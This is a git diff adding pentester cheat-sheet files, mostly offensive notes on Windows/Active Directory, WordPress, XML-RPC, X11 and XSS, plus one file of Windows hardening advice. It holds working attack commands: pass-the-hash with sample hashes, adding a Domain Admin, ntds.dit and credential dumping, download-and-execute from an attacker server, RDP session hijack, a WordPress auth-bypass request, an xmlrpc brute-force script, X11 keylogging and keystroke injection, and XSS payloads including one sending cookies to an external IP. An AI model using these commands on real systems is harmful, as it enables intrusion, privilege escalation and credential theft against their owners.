+# port scanning with netsh
+netsh diag connect iphost 10.0.0.2 443 -> "Server appears to be running on port(s) [NONE] " vs. "Server appears to be running on port(s) [443]"
+
+# netbios / SMB scan
+* list what services are available
+nbtscan
+smbclient -U '%' -L 1.2.3.4
+
+* scan for shares
+nmbscan
+
+* cifs
+mount -t cifs -o user=user,password=secret,domain=DOM '//10.0.0.1/c$' /mnt/pwn
+use -o soft to "soft mount" smb shares then you won't get lockups, etc. if the share disappears, also see -o nolock
+not recommended for persistent shares, as you then want the kernel to do everything it can to restore the mount.
+
+* get mac from IP
+nbtstat -a 10.0.0.2
+
+# net(1) usage
+NB. [ads|rpc|rap] are optional, if omitted, net will try to determine it automatically
+
+net [rpc] info -l -U 'DOM\blah%p4ss' -S 192.168.56.101
+net [rpc] account # pw policy but doesnt work anymore, use enum4linux/polenum instead (https://labs.portcullis.co.uk/tools/)
+
+net [rpc] user
+net [rpc] user info <domain user> # list domain groups of user (without the "DOM\")
+net [rpc] share
+
+net [rpc] group list
+net [rpc] group members administrators
+net [rpc] group members 'Domain users'
+
+net [rpc] registry enumerate 'HKLM\Software'
+
+net [rpc] file
+
+net [rap] session # list of users connected to the server, but always shows empty on my vm (broken?)
+net [rap] server domain # list servers in this domain
+net [rap] domain # list domains
+net [rap] service
+
+net lookup host WKS123
+net lookup dc MAIN
+net lookup master MAIN
+
+net [rpc] trustdom list
+
+net [rap] printq
+
+NB. si certaines commandes ne retournent rien c peut etre parce qu'il faut un samba qui tourne en local
+
+* ajout dans Domain Admins sur un DC
+net user hsc * /add
+net group "Domain admins" hsc /add
+
+# hives
+python regfetch.py security.save 'Policy\Secrets\NL$KM\CurrVal' '(default)' | xxd
+python regfetch.py security.save 'Cache' 'NL$1' | xxd
+
+# hives backups
+c:\windows\repair or c:\windows\system32\config\regback (w2k8)
+
+# run cmd.exe as SYSTEM
+msf current_user_psexec (psh technique) // https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit
+or
+psexec -accepteula -i -s
+or
+sc create testsvc binpath= "cmd /K start" type= own type= interact
+sc start testsvc
+sc delete testsvc
+at / schtasks (wont work on recent windows)
+or
+metastploit meterpreter getsystem
+
+local admin to SYSTEM (w/ or w/out UAC) http://carnal0wnage.attackresearch.com/2013/07/admin-to-system-win7-with-remoteexe.html
+
+# dump creds
+dump local creds  -> offline with impacket/secretsdump.py or creddump/pwdump.py, online with fgdump (only domain accounts: fgdump.exe -c -v -a)
+dump domain creds -> offline with impacket/secretsdump.py or libesedb+ntdsxtract or msf-geek
+dump cached creds -> offline with impacket/secretsdump.py or creddump/cachedump.py, online with meterpreter/cachedump.rb or cachedump or fgdump
+dump lsa secrets  -> offline with impacket/secretsdump.py or creddump/lsadump.py, online with gsecdump
+dump in-memory creds -> offline with mimikatz (outbound SMB sessions), online with wce
+dump passwords remembered in Credential Manager -> netpass
+dump passwords remembered in Protected Storage (IE, Outlook) -> pspv
+dump passwords remembered by third-party software -> NirSoft tools, carrot, msf post modules
+src: http://bernardodamele.blogspot.com.au/
+
+# authenticated code execution 
+http://www.scriptjunkie.us/2013/02/authenticated-remote-code-execution-methods-in-windows/
+https://community.rapid7.com/community/metasploit/blog/2012/11/08/abusing-windows-remote-management-winrm-with-metasploit // use winrm to get a shell
+https://code.google.com/p/impacket/source/browse/trunk/examples/wmiexec.py
+
+# sysinternals/psexec alternatives (noisy: upload binary, creates service, etc.)
+* didnt seem to work on w2k12r2 during a pt
+pth/winexe impacket/psexec.py sysinternals/psexec
+
+* sysinternals/psexec.exe
+psexec -h  to bypass UAC
+
+* impacket/psexec.py (whoami => system)
+http://pen-testing.sans.org/blog/pen-testing/2013/03/27/psexec-python-rocks (import psexec)
+
+* WMI // needs DCOM access and beware about semi-interactive shells (eg. cant run cmds that would last long)
+impacket/wmiexec.py (whoami => user)
+pth/wmis
+http://www.room362.com/blog/2014/04/19/executing-code-via-smb-without-psexec/ (import wmiexec)
+http://passing-the-hash.blogspot.co.nz/2013/07/WMIS-PowerSploit-Shells.html
+
+* winexe-PTH (whoami => twadmin)
+winexe-PTH --uninstall -U DOM/twadmin%Password1 //10.0.0.1 cmd.exe
+
+* metasploit psexec.rb 
+http://carnal0wnage.attackresearch.com/2013/07/metasploit-standalone-psexec.html (uploaded .exe has to be a service executable)
+
+* Veil-Catapult
+http://diablohorn.wordpress.com/2013/10/19/alternative-psexec-no-wmi-services-or-mof-needed/
+
+# NT_STATUS_INVALID_WORKSTATION
+winexe --netbiosname=<name of target host>
+
+# pass-the-hash
+didnt seem to work on w2k12r2 during pt: xfreerdp /pth
+
+http://www.harmj0y.net/blog/penetesting/pass-the-hash-is-dead-long-live-pass-the-hash/
+
+https://code.google.com/p/passing-the-hash/
+winexe --uninstall -U renadm%aad3b435b51404eeaad3b435b51404ee:780ede86e3d0878243a4fabd56d72644 //10.0.0.1 cmd.exe
+wmic -U demo/administrator%hash //172.16.1.1 "select csname,name,processid,sessionid from win32_process"
+wmis -U demo/administrator%hash //172.16.1.1 'cmd.exe /c dir c:\ > c:\windows\temp\blog.txt' # http://passing-the-hash.blogspot.com.au/
+smbclient -U demo\\user%aad3b435b51404eeaad3b435b51404ee:780ede86e3d0878243a4fabd56d72644
+smbget -w demo -u demo\\administrator -O -p <hash> smb://172.16.1.1/c$/windows/temp/blog.txt
+xfreerdp /pth:
+nmap --script-args smbuser=foo,smbhash=<nt-only-works>
+
+net time \\target
+at \\target HH:MM c:\path\to\bad.exe
+wmic /node:TARGET process call create "c:\path\to\bad.exe"
+sc \\target create blah binpath=c:\path\to\bad.exe
+sc \\target start blah
+
+# backtrack/forensic
+* post/windows/gather/enum_termserv
+list users who used mstsc and where they connected to
+
+* parse user artefacts
+with what tools?
+
+# enum users
+* nmap/smb-enum-users.nse
+./nmap -p U:137,T:139 --script smb-enum-users --script smb-enum-groups --script-args=smbusername=blah,smbpassword/smbhash=...,smbdomain=FOO,samronly=1 -vv 192.168.122.196
+
+* metasploit/auxiliary/scanner/smb/smb_enumusers
+list local users
+[*] 192.168.122.74 WIN-LEK1BKKKKD8 [ Administrator, Guest, foo ] ( LockoutTries=0 PasswordMin=0 )
+
+# enum logged-on users && hunt VIP
+* Derivative Local Admins
+https://www.sixdub.net/?p=591
+
+* eventlogs (need DA privs)
+psloglist.exe \\dc1.corp.com -u twadmin -p Password1 -s -i 4624,4768,4769 -accepteula security > %TEMP%\extract.csv
+Get-UserLogonEvents / Invoke-UserLogonHunter (http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/)
+
+* other stealthier ways
+https://www.netspi.com/blog/entryid/214/faster-domain-escalation-using-ldap
+https://www.netspi.com/blog/entryid/132/5-ways-to-find-systems-running-domain-admin-processes
+
+* http://www.slideshare.net/harmj0y/i-hunt-sys-admins
+impacket smbclient.py adm-lulz:Password123@192.168.122.23 -file <(echo who) # only lists inbound smb conns (same as net rap session but doesnt require admin creds)
+psloggedon (doesnt show source IP?)
+netsess.exe (can query remote computer, no admin privs required) http://www.joeware.net/freetools/tools/netsess/index.htm 
+PVEFindADUsers (need admin access) https://www.corelan.be/index.php/2009/07/12/free-tool-find-where-ad-users-are-logged-on-into/
+netview.exe (spray, no admin privs) https://github.com/mubix/netview
+smb-enum-sessions.nse (only need valid domain or local account) ./nmap --script smb-enum-sessions.nse --script-args=smbusername=administrator,smbpassword=Password1 -vv -p 445 10.0.0.0/24
+nbtenum.exe (http://nbtenum.sourceforge.net/) // never tested
+veil-powerview Invoke-UserHunter Invoket-StealthUserHunter (also checks if you're local admin) https://www.veil-framework.com/hunting-users-veil-framework/ http://www.harmj0y.net/blog/penetesting/finding-local-admin-with-the-veil-framework/
+powersploit/Invoke-TokenManipulation https://www.trustedsec.com/january-2015/account-hunting-invoke-tokenmanipulation/
+
+* metasploit 
+post/windows/gather/local_admin_search_enum.rb (query all domain machines to find where im local admin) // never tested
+post/windows/gather/enum_domain_users.rb (query all domain machines to find where target users are logged in | http://www.sensepost.com/blog/8764.html msf module better than PsLoggedOn?) // never tested
+auxiliary/scanner/smb/psexec_loggedin_users (doesnt list SMB sessions)
+auxiliary/scanner/smb/smb_enumusers_domain (determine what domain users are logged into a remote system) // never tested
+
+# harvest user/group in AD from parsing ntds.dit
+https://bitbucket.org/iwseclabs/bta
+
+# {meterpreter,psexec,psloggedon}-fu
+http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass
+
+# UAC bypass
+https://dfirblog.wordpress.com/2015/10/24/protecting-windows-networks-uac/
+https://github.com/hfiref0x/UACME
+
+# dump domain hashes using offline copy of ntds.dit and SYSTEM 
+* sc query vss
+
+* get path to ntds.dit (default location is c:\windows\ntds\ntds.dit)
+reg.exe query HKLM\System\CurrentControlSet\Services\NTDS\Parameters -> "DSA Database file"
+
+* copy ntds.dit using Volume Shadow Copy
+manually with ntdsutil or vssadmin (pre 2008)
+
+automatically with msf
+  - psexec_command: http://www.pentestgeek.com/2013/01/10/psexec_command-not-your-daddys-psexec
+  - pentestergeek: http://www.accuvant.com/blog/owning-computers-without-shell-access (msf-geek)
+
+reg.exe save hklm\system c:\temp\system.save
+
+* restore vss service to original state
+
+* extract hashes
+impacket/secretsdump.py
+or {
+libesedb: ./esedbexport -l /tmp/export.log -t /tmp/export ntds.dit {
+NTDSXtract: python dsusers.py /tmp/export/datatable.3 /tmp/export/link_table.5 --passwordhashes system.save
+or
+msf-geek: ntds_hashextract.rb /tmp/export/datatable.3 /ww/system.save }}
+
+# ntdsutil (http://technet.microsoft.com/en-us/library/cc753609(WS.10).aspx)
+ntdsutil.exe, snapshot, activate instance NTDS, list all, create, list all, mount 2, unmount 2, delete 1, quit
+or 
+ntdsutil.exe, ac in ntds, ifm, cr fu c:\test, q, q # https://bitbucket.org/iwseclabs/bta
+
+# vssadmin
+sc query vss
+vssadmin create shadow /for=C: // write down the uuid
+copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy..\Windows\NTDS\ntds.dit \\mylatop\share\ntds.dit
+vssadmin delete Shadows /Shadow={<UUID>} 
+sc stop vss
+sc query vss
+
+# ntds explorer
+https://github.com/yosqueoy/ditsnap
+
+# dump in-memory passwords
+* mimikatz+powershell to dump lots of hosts
+http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-passwords-with.html 
+
+# wget in vbs (kyp)
+echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")>>wget.vbs
+echo objXMLHTTP.open "GET", WScript.Arguments(0),false>>wget.vbs
+echo objXMLHTTP.send()>>wget.vbs
+echo if objXMLHTTP.Status = 200 Then>>wget.vbs
+echo    Set objADOStream = CreateObject("ADODB.Stream")>>wget.vbs
+echo    objADOStream.Open>>wget.vbs
+echo    objADOStream.Type = 1 'adTypeBinary>>wget.vbs
+echo    objADOStream.Write objXMLHTTP.ResponseBody>>wget.vbs
+echo    objADOStream.Position = 0>>wget.vbs
+echo    Set objFSO = Createobject("Scripting.FileSystemObject")>>wget.vbs
+echo    Set objFSO = Nothing>>wget.vbs
+echo    objADOStream.SaveToFile LCase(WScript.Arguments(1))>>wget.vbs
+echo    objADOStream.Close>>wget.vbs
+echo    Set objADOStream = Nothing>>wget.vbs
+echo  End if>>wget.vbs
+echo Set objXMLHTTP = Nothing>>wget.vbs
+
+# download and execute
+* with the BITSAdmin tool (win7+)
+bitsadmin /transfer job_name /download http://domain.com/file_name.exe c:\file_path\file_name.exe
+voir le sploit msf 
+* with mshta (cf. exploit modules in msf)
+* ipmo
+PS C:\> ipmo BitsTransfer;Start-BitsTransfer -Source http://foo/nc.exe -Destination C:\Windows\Temp\
+* Enable the tftp client in Vista & higher, and pull files to a compromised server:
+C:\> ocsetup TFTP /quiet
+C:\> tftp -i attacksrv get bin.exe
+
+# bypass gpo proxy settings with regedit
+http://blog.scriptmonkey.eu/bypassing-group-policy-using-the-windows-registry/
+
+# know windows processes
+http://sysforensics.org/2014/01/know-your-windows-processes.html
+
+# bypass GPO path restrictions for Runas
+https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/RunAs.ps1
+
+# ssp filter
+http://kobyk.wordpress.com/2008/08/30/implementing-an-lsa-proxy-authentication-package/
+http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html (requires reboot)
+http://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/ (inject dll into lsass)
+https://code.google.com/p/mimikatz/source/browse/trunk/kiwissp/kiwissp.c (another example of ssp)
+
+# client side exploitation + priv escalation
+https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module/
+
+# domain trusts
+http://www.harmj0y.net/blog/redteaming/domain-trusts-why-you-should-care/
+http://www.harmj0y.net/blog/redteaming/domain-trusts-were-not-done-yet/
+http://www.harmj0y.net/blog/redteaming/the-trustpocalypse/
+
+# use netsh to capture network traffic
+http://high54security.blogspot.co.nz/2015/03/netsh-trace-when-installing-winpcap-or.html
+https://isc.sans.edu/diary/No+Wireshark%3F+No+TCPDump%3F+No+Problem%21/19409
+
+# persistence
+http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/ # run task even if i'm not logged-in
+https://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/ (msf/s4u_persistence.rb)
+https://enigma0x3.wordpress.com/2015/03/05/using-alternate-data-streams-to-persist-on-a-compromised-machine/
+http://jumpespjump.blogspot.co.nz/2015/03/thousand-ways-to-backdoor-windows.html
+http://blakhal0.blogspot.com.au/2015/03/windows-event-log-driven-back-doors.html
+https://gist.github.com/subTee/e07e4a8aa6dc0e1cdf5d (Execute Shellcode From Registry with InstallUtil.exe)
+https://adsecurity.org/?p=1906
+
+# the DC machine account is DA
+http://room362.blogspot.co.nz/2015/09/using-domain-controller-account.html
+
+# DnsAdmins -> DA
+https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
+
+# active directory delegation (dscals.exe "ou=offices,dc=nss,dc=local")
+https://www.notsosecure.com/active-directory-delegation-manual-analysis/
+
+# finding where GPP account is a local admin
+http://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/
+
+# most common AD security issues
+https://adsecurity.org/?p=1684
+
+# lnk vuln
+ms10-046 Stuxnet, incomplete fix cve-2015-0096, patched again with ms15-020: http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459
+
+# retrieve kerberos arc4-hmac encrypted Tickets Granting Service (TGS) of accounts having a Service Principal Name (SPN) within an Active Directory
+https://github.com/Synacktiv/kerberom
+
+# hijack any RDP session with SYSTEM
+query user; sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#46"
+http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html
+
+# RCEs
+# https://technet.microsoft.com/en-us/library/security/dn631937.aspx
+* ms03-039 (CVE-2003-0605)
+w2k SP1-4, XP SP0-1, w2k3?
+https://www.exploit-db.com/exploits/76/
+
+* ms06_040
+vuln: windows NT4 forever, Windows 2000 before SP5 or missing KB921883 which was included in SP5 (you can manually check the installed KBs at hklm\software\microsoft\updates\windows 2000)
+
+* ms08_067
+vuln: windows 2000 before SP5 or missing KB958644
+http://technet.microsoft.com/en-us/security/bulletin/ms08-067
+http://support.microsoft.com/kb/958644
+
+* ms14-066
+http://blog.beyondtrust.com/triggering-ms14-066 https://github.com/anexia-it/winshock-test
+
+* ms14-068
+http://adsecurity.org/?p=676
+https://technet.microsoft.com/library/security/MS14-068
+KB3011780
+
+* ms14-70 (CVE-2014-4076)
+local on 2003 x86 and XP (forever unpatched unless you pay)
+https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt
+
+* skeleton key (for persistence)
+http://adsecurity.org/?p=1275 http://adsecurity.org/?p=1255
+
+* ms15-011 (mwr)
+https://blog.coresecurity.com/2015/05/18/ms15-011-microsoft-windows-group-policy-real-exploitation-via-a-smb-mitm-attack/
+https://youtu.be/wVLD2iT6ADo?t=198
+https://twitter.com/mubix/status/652325775891374080
+https://labs.mwrinfosecurity.com/blog/2015/04/02/how-to-own-any-windows-network-with-group-policy-hijacking-attacks/
+https://labs.mwrinfosecurity.com/blog/2015/02/13/practically-exploiting-ms15-014-and-ms15-011/
diff --git a/Cheat Sheet/windows_recommendations b/Cheat Sheet/windows_recommendations
new file mode 100644
index 0000000..ba1f50c
--- /dev/null
+++ b/Cheat Sheet/windows_recommendations	
@@ -0,0 +1,43 @@
+# windows recommendations
+
+https://dfirblog.wordpress.com/2015/11/08/protecting-windows-networks-defeating-pass-the-hash/
+http://passing-the-hash.blogspot.com.au/
+http://digital-forensics.sans.org/blog/2014/11/13/protecting-privileged-domain-accounts-restricted-admin-and-protected-users
+http://www.aorato.com/blog/remote-desktops-restricted-admin-cure-worse-disease/
+https://labs.portcullis.co.uk/blog/new-restricted-admin-feature-of-rdp-8-1-allows-pass-the-hash/
+
+* 8.1
+- No more plaintext creds in memory
+Microsoft introduced new security features in Windows 8.1; by default domain accounts no longer store plaintext passwords in memory on a system, should clean up the hash and kerberos tickets better on logout, and if the account is a Protected User, the hash will not be present either (although a Kerberos TGT will be).
+
+- Restricted Admin mode for Remote Desktop Connection
+Authenticates the user with a network logon and avoids storing the user credentials on the remote host.
+This is the only safe form of an interactive logon to an untrusted host. Used to be turned on by default before MS changed their mind in July 2014.
+This is particularly appropriate for systems administrators who need a desktop environment. Unfortunately the target system must be running Windows 8.1 or Server 2012R2, though the client can be Windows 7 or higher with KB2871997 applied.
+If the account logged in remotely via Restricted Admin Remote Desktop, no stealable credentials will be put on the remote system at all (the computer account will be in memory instead). The username & password are never sent to the compromised system, instead the client authenticates via network logon using either Kerberos or NTLM. However this means an attacker can pass-the-hash (NTLM) or pass-the-ticket to RDP in.
+
+* Protected Users (active directory group) 
+The Protected Users group provides a number of beneficial changes to protect its members, including disabling delegation, enforcing Kerberos with only AES encryption, and preventing the storage of cached domain credentials. It is highly recommended to take advantage of the protections provided by this new group. Keep in mind though that interactive logons with Protected User accounts still result in sensitive credential information being created in memory--in particular the user's Kerberos TGT--so Protected Users must still avoid interactive logons to untrusted hosts.
+
+Native feature to Windows 2012R2 domains. Most of its protections have recently been added to legacy domains (2008R2/2012) via update KB2871997.
+Members of this group have delegation disabled automatically (can't impersonate token anymore).
+Members of this group are forced to used Kerberos authentication. (Kerberos with AES only, not DES or RC4).
+Kerberos long-term keys are not kept in memory. User must manually re-authenticate when TGT expires (4 hours instead of the 10 hours default).
+Users og this group will not have their cached domain credentials stored.
+
+However if a domain admin was a Protected User and logged into a compromised server, the attacker who controls that server would have temporary access to that domain admin account via the TGT. By dumping the domain's hash database with that TGT, the attacker now has permanent access with full control over the domain. However, I still consider Protected Users an improvement since the exposure duration of kerberos tickets (a few hours) is vastly less than the exposure duration of hashes (good forever until password change).
+
+* silos
+Microsoft also introduced authentication silos, which restrict where an account can log in from. 
+allow login from admin workstations
+
+* domain admins
+http://www.irongeek.com/i.php?page=videos/circlecitycon2014/220-active-directory-real-defense-for-domain-admins-jason-lang
+
+* pass the hash mitigations "mimikatz KB" KB2871997 (http://www.pwnag3.com/2014/05/what-did-microsoft-just-break-with.html)
+local accounts can no longer be used to access remote systems, either via simple network logon or interactive login (PSEXEC or browsing C$ remotely)
+so you can't pth local accounts, but you still can pth RID 500 (unless disabled) and domain accounts member of the Administrators group
+it also will cause the OS to clear creds from memory when the user properly logs off (after ~30 seconds)
+
+* KB2928120
+prevents from storing passwords in GPO
diff --git a/Cheat Sheet/wireshark b/Cheat Sheet/wireshark
new file mode 100644
index 0000000..9b8784e
--- /dev/null
+++ b/Cheat Sheet/wireshark	
@@ -0,0 +1,9 @@
+# wireshark
+
+# decrypt SSL
+127.0.0.1,443,http,/path/to/wireshark_ssl/privkey.pem
+
+https://isc.sans.edu/forums/diary/Psst+Your+Browser+Knows+All+Your+Secrets+/16415
+
+# full stack packet editor
+https://wireedit.com/
diff --git a/Cheat Sheet/wordpress b/Cheat Sheet/wordpress
new file mode 100644
index 0000000..cec25dd
--- /dev/null
+++ b/Cheat Sheet/wordpress	
@@ -0,0 +1,82 @@
+# wordpress
+
+# scanners
+wpscan --url blah.com -e u,vt,vp (based on https://wpvulndb.com/)
+
+# fingerprint
+GET /readme.html
+./plecost/PKGBUILD:pkgdesc="Wordpress finger printer tool search and retrieve information about the plugins versions installed in Wordpress systems."
+
+# exploit framework
+http://pentestit.com/wpxf-wordpress-exploit-framework/
+
+# username enumeration
+?author=1
+
+# releases
+https://wordpress.org/news/category/releases/
+
+# unauth modification of blog posts < 4.7.2 due to type juggling
+https://blogs.akamai.com/2017/02/wordpress-web-api-vulnerability.html
+authorization checks can be bypassed by including an "id" parameter value in either the query_string or POST payload that contains any non-numeric character
+post('/index.php/wp-json/wp/v2/posts/1', json={"id":"1aha","title":"owned","content":"haha"})
+
+# xss in comments to rce (affected: 4.2, 4.1.2, 3.9.3 ...)
+http://klikki.fi/adv/wordpress2.html
+
+# rce
+http://vagosec.org/2013/12/wordpress-rce-exploit/
+
+# sqli + rce
+http://blog.checkpoint.com/2015/08/11/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-ii-supremacy/
+
+# cookie integrity fail CVE-2008-1930 <=2.5
+https://pentesterlab.com/exercises/cve-2008-1930/course
+
+# auth cookie forgery wordpress <3.7.2 & <3.8.2
+http://www.securitysift.com/understanding-wordpress-auth-cookies/
+https://labs.mwrinfosecurity.com/blog/2014/04/11/wordpress-auth-cookie-forgery/
+
+# bf login creds via /xmlrpc.php when wp-login.php is filtered
+# with wp < 4.4.1 you can send 500 l/p in one request to bypass rate limiting
+https://github.com/zendoctor/wpbrute-rpc
+https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-xmlrpc.html -> msf/auxiliary/scanner/http/wordpress_multicall_creds
+
+http://www.hsc-news.com/archives/2014/000123.html
+$ echo '<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>system.listMethods</methodName><params></params></methodCall>' > get_method.xml
+  List avail methods first (methods can be removed in the wp configuration)
+$ curl -v -H "User-Agent: Mozilla/5.0" -X POST -d @get_method.xml --url "http://cible.com/xmlrpc.php"
+
+ NB : si cette requête vous renvoie un code d'erreur (403, 400, 501,etc.),
+ outre les tests habituels avec les entêtes de provenances "X-*", vérifiez une
+ méthode exotique comme :
+
+$ curl -v -H "User-Agent: Mozilla/5.0" -X TOTO -d @get_method.xml --url "http://cible.com/xmlrpc.php"
+
+import xmlrpclib
+
+bruteForce(url,listUser, listPassword):
+ server = xmlrpclib.Server(url) #url = http://cible.com/xmlrpc.php
+ for user in listUser :
+   for pwd in listPassword :
+     param=['',user,pwd]
+     try:
+       res=server.blogger.getUserInfo(param)
+     except Exception as im :
+       pass
+     else:
+       print " Win \o/ : "+user+" : "+pwd
+
+or
+
+POST /xmlrpc.php HTTP/1.1
+Host: blah
+Accept-Encoding: gzip
+User-Agent: xmlrpclib.py/1.0.1 (by www.pythonware.com)
+Content-Type: text/xml
+Content-Length: 286
+
+<?xml version='1.0'?><methodCall><methodName>blogger.getUserInfo</methodName><params><param><value><array><data><value><string></string></value><value><string>admin</string></value><value><string><![CDATA[FILE0]]></string></value></data></array></value></param></params></methodCall>
+zombies use wp.getCategories 
+
+http_fuzz url='/xmlrpc.php' header='Content-Type: text/xml' method=POST body=@body.xml auto_urlencode=0 -x ignore:fgrep='Incorrect username or password'
diff --git a/Cheat Sheet/xml b/Cheat Sheet/xml
new file mode 100644
index 0000000..4476b68
--- /dev/null
+++ b/Cheat Sheet/xml	
@@ -0,0 +1,32 @@
+# xml
+
+# xmldecoder and restlet
+rce http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html
+
+# saml
+https://github.com/SAMLRaider/SAMLRaider
+http://research.aurainfosec.io/bypassing-saml20-SSO/
+
+# xmlprc
+curl -d '<?xml version="1.0"?><methodCall><methodName>system.listMethods</methodName></methodCall>' http://.../api.php
+
+POST / HTTP/1.1
+Host: ...
+
+<?xml version="1.0"?><methodCall><methodName>system.methodHelp</methodName> <params>
+  <param><value>
+    <string>auth.logIn</string>
+    </value></param>
+  </params></methodCall>
+
+
+import xmlrpclib
+php_url = 'http://www.pythonchallenge.com/pc/phonebook.php'
+server = xmlrpclib.Server(php_url)
+
+server.system.listMethods()
+server.system.methodHelp('phone')
+server.phone('Bert')
+
+# xtream (via dynamic proxies)
+vuln: Spring OXM, Sonatype, Nexus, Jenkins (Jenkins XML API uses XStream to deserialize input)
diff --git a/Cheat Sheet/xorg-x11 b/Cheat Sheet/xorg-x11
new file mode 100644
index 0000000..26ff389
--- /dev/null
+++ b/Cheat Sheet/xorg-x11	
@@ -0,0 +1,28 @@
+# x11
+
+# simple test
+$ DISPLAY=targethost:0 xlsfonts/xrandr/xev
+
+# screenshot
+  - xwd/xwud
+faire des screenshots qd pas de controle d'acces:
+$ xwd -display x.x.x.x:0 -root > fic.xwd
+  - vncsnapshot
+
+# keylogging
+xmacrorec2
+xspy
+
+# inject keycodes
+xwininfo -root -children / for i in $(xdotool search '.') ; do xdotool getwindowname $i ; done
+; making sure mouse will be top left when openbox menu opens, then right click to spawn it and click on the Terminal entry (first entry by default on ubuntu)
+xdotool mousemove 50 50; sleep 1; xdotool click --window 232 3; sleep 1; xdotool mousemove_relative --sync 45 10; sleep 1; xdotool click 1 
+; bring mouse over window (window may need to be moved to +0+0 beforehand with xdotool windowmove 0xabcd), and type commands
+xdotool mousemove 110 160; sleep 1; xdotool key Return; sleep 1; xdotool type clear; sleep 1; xdotool key Return or xdotool type $'\nclear\ntouch /tmp/woot\n' # ^L + ^U didnt work with roxterm
+
+# graphical shell to exploit unauthenticated x11 sessions
+https://github.com/sensepost/xrdp
+
+# fake key generation
+http://op-co.de/blog/posts/hacking_the_nx300/
+http://bharathisubramanian.wordpress.com/2010/03/14/x11-fake-key-event-generation-using-xtest-ext/
diff --git a/Cheat Sheet/xrandr b/Cheat Sheet/xrandr
new file mode 100644
index 0000000..41a1655
--- /dev/null
+++ b/Cheat Sheet/xrandr	
@@ -0,0 +1,10 @@
+# xrandr
+
+# desactiver la sortie externe
+xrandr --output VGA-0 --off
+# activer la sortie externe en mode clone
+xrandr --output VGA-0 --auto
+
+# etendre le bureau sur 2 ecrans avec l'ecran externe sur la droite de l'ecran interne
+xrandr --output VGA-0 --right-of LVDS
+
diff --git a/Cheat Sheet/xslt b/Cheat Sheet/xslt
new file mode 100644
index 0000000..673ae50
--- /dev/null
+++ b/Cheat Sheet/xslt	
@@ -0,0 +1,8 @@
+# xslt
+
+# xxe + xslt = rce (esp. in Java)
+# solr running a java xslt implementation Apache Xalan-J
+http://www.agarri.fr/kom/archives/2013/11/27/compromising_an_unreachable_solr_server_with_cve-2013-6397/index.html
+
+# xalan-java
+even if explicitly disabled, can be workaround via nested stylesheets
diff --git a/Cheat Sheet/xss b/Cheat Sheet/xss
new file mode 100644
index 0000000..2688318
--- /dev/null
+++ b/Cheat Sheet/xss	
@@ -0,0 +1,189 @@
+# xss
+
+# to checkout
+http://www.xss-payloads.com/
+https://github.com/mandatoryprogrammer/xsshunter
+https://github.com/Netflix/sleepy-puppy
+
+https://github.com/jackmasa/XSS.png # mind map
+https://html5sec.org/ https://github.com/cure53/H5SC https://github.com/cure53/XSSChallengeWiki/wiki/prompt.ml
+https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
+
+# test your payloads with
+http://jsfiddle.net/njx5B/3/
+
+# evasion
+https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
+~/Documents/papers/favorite_xss_filter_and_bypass.pdf,xss_bypass.txt
+https://soroush.secproject.com/blog/2014/04/how-did-i-bypass-everything-in-modsecurity-evasion-challenge/
+http://sirdarckcat.blogspot.com.au/
+https://www.youtube.com/watch?v=tDjw0cmKS48 "Unusual Web Bugs" by kuza55
+https://github.com/aemkei/katakana.js # Write JavaScript alert(1) with Katakana characters only
+
+# safari URL redirection XSS - CVE-2016-4585
+http://www.mbsd.jp/blog/20160921_2.html
+
+# flash
+https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/
+http://web.archive.org/web/20130808104241/http:/appsec.ws/FlashExploitDatabase.php
+
+# misc tricks / filter evasion
+<svg/onload=alert(document.domain)>;
+<svg/onload=window.onerror=alert;throw/XSS/;//
+<iframe/onload=action=/confir/.source+'m';eval(action)(1)> 
+
+<body/onload=
+" style="tr:expression(malicious_script)
+
+document['location']='http://217.174.211.25/'+document['cookie'] # sans les caracteres '.' et ' '
+onfocus="alert(0)" autofocus="autofocus" asdf="
+<style>body  > *{display:none;}body:after{font-size:xx-large;content:"this is not how you send people to mars"}</style>
+
+div><img/src=a onerror=alert(0)>
+
+<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAFCAYAAACNbyblAAAAHElEQVQI12P4//8/w38GIAXDIBKE0DHxgljNBAAO9TXL0Y4OHwAAAABJRU5ErkJggg==" alt="Red dot" />
+
+Location: data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg== # based64(<script>alert(0)</script>)
+<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==">  # ff
+"><x style="x:expression(alert(0)) # ie
+
+<ScRiPt>
+<scrscriptipt> or <scr<script>ipt>
+<<b>script> // ruby strip_tags()
+target=""onload="..." // filter to remove target/onload/... is applied only once (yammer worm)
+%c0%bcscript%c0%bealert ...
+eval(String.fromCharCode(...
